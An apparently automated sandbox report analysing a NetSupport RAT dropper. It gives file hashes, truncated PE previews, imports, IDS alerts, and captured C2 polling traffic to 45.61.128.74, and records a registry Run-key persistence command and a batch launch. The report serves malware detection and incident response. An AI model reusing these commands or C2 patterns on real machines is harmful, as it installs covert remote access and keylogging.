                                                                                  SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\Public\Public\Videos\Video\remcmdstub.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):77224
                                                                                  Entropy (8bit):6.793971095882093
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                  MD5:325B65F171513086438952A152A747C4
                                                                                  SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                  SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                  SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 13%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loca[1].htm

                                                                                  Download File
                                                                                  Process:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):15
                                                                                  Entropy (8bit):2.7329145639793984
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:QJgTG:QkG
                                                                                  MD5:8AB0D91EF06123198FFAC30AD08A14C7
                                                                                  SHA1:46D83BB84F74D8F28427314C6084CC9AFE9D1533
                                                                                  SHA-256:DB50064FEE42FB57DCFD9C4269A682331246224D6108A18DB83ABD400CCECA12
                                                                                  SHA-512:1AA8560708AD663C4D5D0C2199E2CE472D11748EDA18848AAA3430C6F333BB04DA65DFFF4144BFEEA3860CA30F7F832EC64FF6D5B0731AC8878050601AC7A3A3
                                                                                  Malicious:false
                                                                                  Preview:32.7767,-96.797

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.940330546772841
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:file.exe
                                                                                  File size:2'138'286 bytes
                                                                                  MD5:166d71e145b2c802acd2b0a07e070bad
                                                                                  SHA1:1c84d2e573e7096040fbe6e950fbff764aa11096
                                                                                  SHA256:33b22fce68d5d7bd08e86b8506c50bdfcd38c26db5983864e8d33bdf62f53272
                                                                                  SHA512:5137efaeda15554cf5b8ff68516d91b9cb3e960b85970f535e8735b1705f62cb390ffef4c7b964ed33764cd3b772aaca0ac1468ec67abe7fd2de9ddf2465f6e4
                                                                                  SSDEEP:49152:VIf3w6NbHHBp7k5hhJ+j0h7x0vRNT1UTzPN0EkHbG+n9:VIfwYt5ShrfKvo1U
                                                                                  TLSH:61A52302B9D3C5B2D53308350B196F55747DBE303F18CDAAE7C95E1EDA31292A628B63
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~..............b.......b..<....b......)^...................................................... ....... .......%....... ......

                                                                                  File Icon

                                                                                  Icon Hash:1515d4d4442f2d2d

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x41d779
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x5C72EA7E [Sun Feb 24 19:03:26 2019 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:00be6e6c4f9e287672c8301b72bdabf3

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007FA10932700Fh
                                                                                  jmp 00007FA109326A03h
                                                                                  cmp ecx, dword ptr [0043A1C8h]
                                                                                  jne 00007FA109326B75h
                                                                                  ret
                                                                                  jmp 00007FA109327186h
                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                  mov eax, ecx
                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                  mov dword ptr [ecx+04h], 00430FE8h
                                                                                  mov dword ptr [ecx], 00431994h
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  push dword ptr [ebp+08h]
                                                                                  mov esi, ecx
                                                                                  call 00007FA10931A10Dh
                                                                                  mov dword ptr [esi], 004319A0h
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                  mov eax, ecx
                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                  mov dword ptr [ecx+04h], 004319A8h
                                                                                  mov dword ptr [ecx], 004319A0h
                                                                                  ret
                                                                                  lea eax, dword ptr [ecx+04h]
                                                                                  mov dword ptr [ecx], 00431988h
                                                                                  push eax
                                                                                  call 00007FA109329D1Eh
                                                                                  pop ecx
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push esi
                                                                                  mov esi, ecx
                                                                                  lea eax, dword ptr [esi+04h]
                                                                                  mov dword ptr [esi], 00431988h
                                                                                  push eax
                                                                                  call 00007FA109329D07h
                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                  pop ecx
                                                                                  je 00007FA109326B7Ch
                                                                                  push 0000000Ch
                                                                                  push esi
                                                                                  call 00007FA109326142h
                                                                                  pop ecx
                                                                                  pop ecx
                                                                                  mov eax, esi
                                                                                  pop esi
                                                                                  pop ebp
                                                                                  retn 0004h
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 0Ch
                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                  call 00007FA109326ADEh
                                                                                  push 00437B58h
                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                  push eax
                                                                                  call 00007FA109329406h
                                                                                  int3
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 0Ch

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [C++] VS2015 UPD3.1 build 24215
                                                                                  • [EXP] VS2015 UPD3.1 build 24215
                                                                                  • [RES] VS2015 UPD3 build 24213
                                                                                  • [LNK] VS2015 UPD3.1 build 24215

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x38cd00x34.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x38d040x3c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000xe034.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000x1fd0.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x36ee00x54.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x319280x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x300000x25c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x382540x120.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x2e8640x2ea008c2dd3ebce78edeed565107466ae1d3eFalse0.5908595844504021data6.693477406609911IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x300000x9aac0x9c00b8d3a709e8e2861298e51f270be0f883False0.45718149038461536data5.133828516884417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x3a0000x213d00xc007a066b052b7178cd1388c71d17dec570False0.2789713541666667data3.2428863859698565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .gfids0x5c0000xe80x2000a8129f1f5d2e8ddcb61343ecd6f891aFalse0.33984375data2.0959167744603624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x5d0000xe0340xe200d62594e063ef25acc085c21831d77a75False0.6341779590707964data6.802287495720703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x6c0000x1fd00x2000983e78af74da826d9233ebaa3055869aFalse0.8060302734375data6.687357530503152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  PNG0x5d6440xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                  PNG0x5e18c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                  RT_ICON0x5f7380x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                  RT_ICON0x5fca00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                  RT_ICON0x605480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                  RT_ICON0x613f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                  RT_ICON0x618580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                  RT_ICON0x629000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                  RT_ICON0x64ea80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                  RT_DIALOG0x68c1c0x2a2data0.5296735905044511
                                                                                  RT_DIALOG0x68ec00x13adata0.6624203821656051
                                                                                  RT_DIALOG0x68ffc0xf2data0.71900826446281
                                                                                  RT_DIALOG0x690f00x14edata0.5868263473053892
                                                                                  RT_DIALOG0x692400x318data0.476010101010101
                                                                                  RT_DIALOG0x695580x24adata0.6262798634812287
                                                                                  RT_STRING0x697a40x1fcdata0.421259842519685
                                                                                  RT_STRING0x699a00x246data0.41924398625429554
                                                                                  RT_STRING0x69be80x1dcdata0.5105042016806722
                                                                                  RT_STRING0x69dc40xdcdata0.65
                                                                                  RT_STRING0x69ea00x468data0.375
                                                                                  RT_STRING0x6a3080x164data0.5056179775280899
                                                                                  RT_STRING0x6a46c0xe4data0.6359649122807017
                                                                                  RT_STRING0x6a5500x158data0.4563953488372093
                                                                                  RT_STRING0x6a6a80xe8data0.5948275862068966
                                                                                  RT_STRING0x6a7900xe6data0.5695652173913044
                                                                                  RT_GROUP_ICON0x6a8780x68data0.7019230769230769
                                                                                  RT_MANIFEST0x6a8e00x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllGetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                  gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-16T12:41:03.602345+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.44973045.61.128.74443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 16, 2024 12:41:03.602344990 CET49730443192.168.2.445.61.128.74
                                                                                  Nov 16, 2024 12:41:03.602385998 CET4434973045.61.128.74192.168.2.4
                                                                                  Nov 16, 2024 12:41:03.602459908 CET49730443192.168.2.445.61.128.74
                                                                                  Nov 16, 2024 12:41:03.752183914 CET49730443192.168.2.445.61.128.74
                                                                                  Nov 16, 2024 12:41:03.752206087 CET4434973045.61.128.74192.168.2.4
                                                                                  Nov 16, 2024 12:41:03.752365112 CET4434973045.61.128.74192.168.2.4
                                                                                  Nov 16, 2024 12:41:03.818038940 CET4973180192.168.2.4104.26.0.231
                                                                                  Nov 16, 2024 12:41:03.823124886 CET8049731104.26.0.231192.168.2.4
                                                                                  Nov 16, 2024 12:41:03.823234081 CET4973180192.168.2.4104.26.0.231
                                                                                  Nov 16, 2024 12:41:03.823355913 CET4973180192.168.2.4104.26.0.231
                                                                                  Nov 16, 2024 12:41:03.828351974 CET8049731104.26.0.231192.168.2.4
                                                                                  Nov 16, 2024 12:41:04.692912102 CET8049731104.26.0.231192.168.2.4
                                                                                  Nov 16, 2024 12:41:04.693109989 CET4973180192.168.2.4104.26.0.231
                                                                                  Nov 16, 2024 12:42:53.788378954 CET4973180192.168.2.4104.26.0.231
                                                                                  Nov 16, 2024 12:42:53.794265985 CET8049731104.26.0.231192.168.2.4
                                                                                  Nov 16, 2024 12:42:53.798243999 CET4973180192.168.2.4104.26.0.231

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 16, 2024 12:41:03.804003954 CET5065253192.168.2.41.1.1.1
                                                                                  Nov 16, 2024 12:41:03.813798904 CET53506521.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Nov 16, 2024 12:41:03.804003954 CET192.168.2.41.1.1.10xfdb2Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Nov 16, 2024 12:41:03.813798904 CET1.1.1.1192.168.2.40xfdb2No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                  Nov 16, 2024 12:41:03.813798904 CET1.1.1.1192.168.2.40xfdb2No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                  Nov 16, 2024 12:41:03.813798904 CET1.1.1.1192.168.2.40xfdb2No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • 45.61.128.74connection: keep-alivecmd=pollinfo=1ack=1
                                                                                  • geo.netsupportsoftware.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.44973045.61.128.744437552C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 16, 2024 12:41:03.752183914 CET216OUTPOST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                  Data Raw:
                                                                                  Data Ascii:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.449731104.26.0.231807552C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 16, 2024 12:41:03.823355913 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                  Host: geo.netsupportsoftware.com
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  Nov 16, 2024 12:41:04.692912102 CET1110INHTTP/1.1 200 OK
                                                                                  Date: Sat, 16 Nov 2024 11:41:04 GMT
                                                                                  Content-Type: text/html; Charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  CF-Ray: 8e3735b63fb04677-DFW
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: private
                                                                                  Set-Cookie: ASPSESSIONIDSSBQDBCQ=CPMJHFBAAKDHLDOGGJJCFIDG; path=/
                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                  Vary: Accept-Encoding
                                                                                  cf-apo-via: origin,host
                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hgusk%2BZLajdFXCEbxzRgeaoZ1PT3oUyxz2hbZP9e%2BACtWjTGHJob8KIXCXN7sl3eUpppU35WikOKiVcTLCHkWhQgGqcYS8dQMHALKh84gtq6Uq%2FvobM4AtWGq2i2lEofDewL%2F8UAHpNnwPNX"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1281&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: f32.7767,-96.7970


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:06:41:00
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x150000
                                                                                  File size:2'138'286 bytes
                                                                                  MD5 hash:166D71E145B2C802ACD2B0A07E070BAD
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1700783369.0000000002CE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:06:41:01
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
                                                                                  Imagebase:0x240000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:06:41:01
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:06:41:02
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                  Imagebase:0xdc0000
                                                                                  File size:59'392 bytes
                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:06:41:02
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Imagebase:0x2d0000
                                                                                  File size:105'848 bytes
                                                                                  MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4158412935.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000000.1717304165.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4161374183.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Public\Videos\Video\bild.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 29%, ReversingLabs
                                                                                  • Detection: 49%, Virustotal, Browse
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:06:41:13
                                                                                  Start date:16/11/2024
                                                                                  Path:C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\Public\Public\Videos\Video\bild.exe"
                                                                                  Imagebase:0x2d0000
                                                                                  File size:105'848 bytes
                                                                                  MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1827675738.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1823569679.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.1826096354.00000000002D2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.1827605672.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
